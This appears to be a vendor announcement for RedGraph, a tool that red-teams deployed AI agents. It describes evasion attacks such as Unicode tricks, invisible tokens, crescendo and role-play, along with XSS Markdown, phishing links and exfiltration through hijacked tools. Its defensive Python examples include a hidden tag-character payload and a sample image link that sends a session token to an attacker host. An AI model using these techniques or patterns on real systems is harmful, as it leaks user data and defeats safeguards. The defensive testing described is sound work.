Pillar Security Unveils RedGraph: The World’s First Attack Surface Mapping & Continuous Testing for AI Agents
Today we're excited to announce RedGraph, the world's first attack surface mapping and testing tool for AI agents that enables security teams to discover and validate real exploits in their AI agents continuously. It interacts with AI systems through the browser and works with any web-accessible AI agent, including those built on Microsoft Copilot, Salesforce Agentforce, Google Agentspace, n8n, and more. All findings are exploit-validated and flow directly into Pillar's adaptive guardrails, creating a closed loop where defenses improve continuously alongside the testing.
Why we built it
Security teams own AI agent security, but current tools only test AI models in isolation, divorced from the databases, APIs, tools, and internal data they connect to once deployed. This creates a complex attack surface that existing security testing completely misses. Traditional AI red teaming might give a clean bill of health for the model itself, but it can't see the business logic flaws and attack paths that emerge from the agent's real-world integrations.
RedGraph takes a fundamentally different approach: by directly interacting with your AI agent in its actual environment at runtime, it maps the entire attack surface - every connection, every permission, every potential pivot point from prompt to backend system - then feeds those findings into adaptive guardrails for immediate remediation.
We built RedGraph together with our customers - based on their insights, feedback, and real challenges. They're already using it in production:
“We have numerous AI initiatives throughout the company. Unlike traditional red teaming, RedGraph continuously validates vulnerabilities in our AI agents' attack surface in production, providing complete attack paths that the engineering team can fix immediately. This marks a significant improvement in our security measures,” said Tomer Maman, CISO at Similarweb, a Pillar Security customer.
Why This Changes the Game for Security Teams
How it works:
RedGraph performs active reconnaissance to build a threat model of your specific business logic, then launches coordinated, multi-turn attacks to exploit system-level vulnerabilities. It bridges the gap between technical complexity and business oversight, allowing stakeholders to see exactly how an AI agent can compromise the organization.
This approach delivers four critical advantages:
1. Low Friction, High Visibility.
Security shouldn't be a black box accessible only to engineers. RedGraph creates a low-friction method for implementing red team assessments. Simply provide a target URL or authenticate like a real user, and RedGraph handles the rest, making continuous AI security accessible to non-technical stakeholders.
2. We Map the Kill Chain, Not Just the Assets.
Most tools give you a list of fuzzed prompts. RedGraph gives you a living map. It visualizes the complex web of your AI estate, showing exactly which agent can call which tool and where those tools connect to external systems. This graph-first view reveals the attack paths that actually matter.
3. We Don't Guess. We Exploit.
This is the critical difference. RedGraph doesn't just flag that your "fetch_website" tool might be vulnerable to injection - it actively attempts to exploit it. The adversarial agents probe your application, pivot when blocked, and find the cracks in your business logic.
4. We Hand You the Fix.
Security teams are tired of fighting with developers over theoretical risks. With RedGraph, you get exploit-validated proof. You can hand your engineering team a transcript and supporting evidence showing exactly how the attack happened. Better yet, these findings feed directly into Pillar's adaptive guardrails, allowing you to automatically harden the system against the specific attack vectors we discovered.
Key Capabilities
Graph-First Attack-Path View
RedGraph represents your AI estate as nodes (assistants, agents, roles, tools, MCP servers, datasets, SaaS apps) and edges (can-call, can-read, can-render, has-permission). This illuminates unintended relationships and the paths they enable, showing you where real risk accumulates.
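To make the graph idea concrete, here is a minimal sketch of how typed nodes and edges can be searched for attack paths. It is an illustration only, not RedGraph's implementation: the node names (`support_agent`, `crm_connector`, `customer_db`, and so on) and the helper functions are hypothetical, and only the edge labels come from the description above.

```python
from collections import deque

# Hypothetical AI estate, written as (source, relation, target) triples.
# The relation labels mirror the edge types named in the text.
EDGES = [
    ("user_prompt", "can-call", "support_agent"),
    ("support_agent", "can-call", "fetch_website"),
    ("support_agent", "can-call", "crm_connector"),
    ("crm_connector", "can-read", "customer_db"),
    ("fetch_website", "can-render", "chat_ui"),
]


def build_graph(edges):
    """Index edges by source node for quick traversal."""
    graph = {}
    for src, relation, dst in edges:
        graph.setdefault(src, []).append((relation, dst))
    return graph


def find_paths(graph, start, target):
    """Return every cycle-free path from start to target as a list of hops."""
    paths = []
    queue = deque([(start, [])])
    while queue:
        node, hops = queue.popleft()
        if node == target:
            paths.append(hops)
            continue
        # Nodes already on this path, so we never loop back through them.
        visited = {start} | {dst for _, _, dst in hops}
        for relation, dst in graph.get(node, []):
            if dst not in visited:
                queue.append((dst, hops + [(node, relation, dst)]))
    return paths


graph = build_graph(EDGES)
paths = find_paths(graph, "user_prompt", "customer_db")
for path in paths:
    print(" -> ".join(f"{src} [{rel}] {dst}" for src, rel, dst in path))
```

In this toy estate the search surfaces a single chain from the prompt to the database via the CRM connector. A path like that is a candidate to validate, not a confirmed exploit.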
Business Context Awareness
RedGraph doesn't launch blind attacks. It applies application context to find business logic flaws, prioritize what matters, and map results directly to your threat landscape - minimizing noise and maximizing relevance.
Real-Time Adaptability
During assessments, agents dynamically adjust their tactics. If a path is blocked, they pivot the way a real attacker would, so that if there's a way in, RedGraph is built to find it, even as systems evolve.
What RedGraph Tests
RedGraph blends AI-specific risk analysis with web application security, providing visibility into the real-world weaknesses of agentic systems.
AI Model-Based Risks:
- Threat-surface mapping: Reveals hidden roles, tools, capabilities, and unintended pathways the AI can reach
- Attack-path flow analysis: Uses a graph view of your workflows to spot chained manipulations and multi-turn escalation attempts, then validates the path end-to-end
- Evasion & deception: Exercises Unicode tricks, invisible tokens, adversarial formatting, role-play social engineering, and crescendo (multi-turn) sequences to pressure-test defenses
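As an illustration of the "Unicode tricks" and "invisible tokens" mentioned above, the sketch below scans text for characters that render as nothing but still reach the model. It is a simplified assumption of what such a check could look like, not a description of RedGraph's internals; the function names are hypothetical. It relies on Python's standard `unicodedata` module and flags format characters (category `Cf`, which includes zero-width spaces and bidi controls) plus the Unicode tag block.

```python
import unicodedata

# The Unicode "tag" block mirrors ASCII but renders invisibly.
TAG_BLOCK = range(0xE0000, 0xE0080)


def find_hidden_characters(text):
    """Return (index, code point) pairs for invisible or format characters."""
    findings = []
    for index, char in enumerate(text):
        code = ord(char)
        if code in TAG_BLOCK or unicodedata.category(char) == "Cf":
            findings.append((index, f"U+{code:04X}"))
    return findings


def reveal_tag_payload(text):
    """Map tag-block characters back to the ASCII they shadow."""
    return "".join(
        chr(ord(char) - 0xE0000)
        for char in text
        if 0xE0020 <= ord(char) <= 0xE007E
    )


# Build a prompt that looks harmless but carries a hidden suffix.
smuggled = "".join(chr(0xE0000 + ord(c)) for c in "hi")
prompt = "Summarize this page\u200b" + smuggled

print(find_hidden_characters(prompt))
print(reveal_tag_payload(prompt))
```

A check like this produces false positives on legitimate text, since emoji sequences use zero-width joiners, so it is better treated as a signal to investigate than as a block rule.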
Web Application Risks:
- Unsafe markdown rendering: Detects when the AI can be manipulated into generating malicious Markdown or code blocks that execute XSS payloads within the user interface.
- Malicious link rendering: Finds cases where the agent is coerced into hallucinating or serving phishing URLs that the application renders as trusted, clickable links.
- Data-exfiltration vectors: Exercises how the agent’s legitimate access to tools (like file uploads or API connectors) can be hijacked to bypass controls and leak sensitive context.
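The web application risks above share a common defensive check: inspect what the agent emits before the UI renders it. The sketch below audits Markdown links and images in an agent reply against a host allowlist. It is a minimal example under stated assumptions, not Pillar's guardrail logic: the allowlist, the sample hosts, and `audit_markdown_links` are all hypothetical, and the regular expression handles only simple inline links.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the application is willing to render.
ALLOWED_HOSTS = {"docs.example.com"}

# Matches inline Markdown links and images: [text](url) or ![alt](url).
LINK_PATTERN = re.compile(r"!?\[[^\]]*\]\(\s*([^)\s]+)")


def audit_markdown_links(markdown):
    """Return (url, reason) pairs for links that should not be rendered."""
    findings = []
    for match in LINK_PATTERN.finditer(markdown):
        url = match.group(1)
        parsed = urlparse(url)
        if parsed.scheme.lower() not in ("http", "https"):
            # Covers javascript:, data:, and also relative links.
            findings.append((url, "non-http scheme"))
        elif parsed.hostname not in ALLOWED_HOSTS:
            findings.append((url, "host not on allowlist"))
    return findings


reply = (
    "See [the guide](https://docs.example.com/start), "
    "[reset your password](https://login.attacker.test/reset), "
    "[click here](javascript:void) and "
    "![status](https://attacker.test/pixel.png?d=session-token)"
)

findings = audit_markdown_links(reply)
for url, reason in findings:
    print(f"{reason}: {url}")
```

The image case matters as much as the links: a rendered image URL is fetched automatically, so query parameters on an attacker-controlled host can carry leaked context without any click.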
Advanced, Effective, and Built for the Agentic Era
We built RedGraph on a simple premise: the best defense against autonomous AI systems is an autonomous adversary. This is the world's first AI Attack Surface Management capability embedded within a comprehensive security platform, creating something fundamentally new. This approach delivers a recursive defense model where offense and defense evolve together. Every vulnerability RedGraph discovers flows directly into Pillar's adaptive guardrails, transforming your security posture from static protection into a living system that learns and strengthens with every assessment.
RedGraph is available now and already in use at Fortune 500 and other innovative companies. Visit pillar.security/redgraph to schedule a demonstration, or contact sales@pillar.security.
FAQs
What is RedGraph and how does it differ from traditional AI red teaming tools?
RedGraph is the world's first attack surface mapping and continuous testing tool for AI agents. Unlike traditional red teaming tools that test AI models in isolation, RedGraph interacts with agents in their actual runtime environment, mapping every connection, permission, and pivot point from prompt to backend system — including databases, APIs, tools, and internal data integrations.
How does RedGraph validate vulnerabilities in AI agents rather than just flagging theoretical risks?
RedGraph actively attempts to exploit discovered vulnerabilities rather than simply flagging them. Adversarial agents probe the application, pivot when blocked, and target business logic flaws in real-world integrations. Every finding is exploit-validated, and security teams receive full attack transcripts showing exactly how an attack succeeded — eliminating disputes over theoretical risk.
What AI agent platforms and frameworks does RedGraph support?
RedGraph works with any web-accessible AI agent by interacting through the browser. Supported platforms include Microsoft Copilot, Salesforce Agentforce, Google Agentspace, and n8n, among others. Integration requires only a target URL or user authentication credentials, making it accessible to both technical and non-technical stakeholders without code changes.
What types of attack vectors does RedGraph test in agentic AI systems?
RedGraph tests both AI-specific and web application risks. On the AI side, it covers threat-surface mapping, multi-turn attack-path analysis, and evasion techniques including Unicode tricks, invisible tokens, and crescendo sequences. Web application tests include unsafe markdown rendering, malicious link injection, and data-exfiltration vectors via hijacked tool access like file uploads or API connectors.
How does RedGraph connect continuous testing to ongoing defense improvements in AI deployments?
RedGraph creates a closed-loop defense model by feeding every exploit-validated finding directly into Pillar Security's adaptive guardrails. This transforms security posture from static protection into a living system that hardens automatically against the specific attack vectors discovered. Similarweb's CISO described it as providing complete attack paths that engineering teams can fix immediately in production.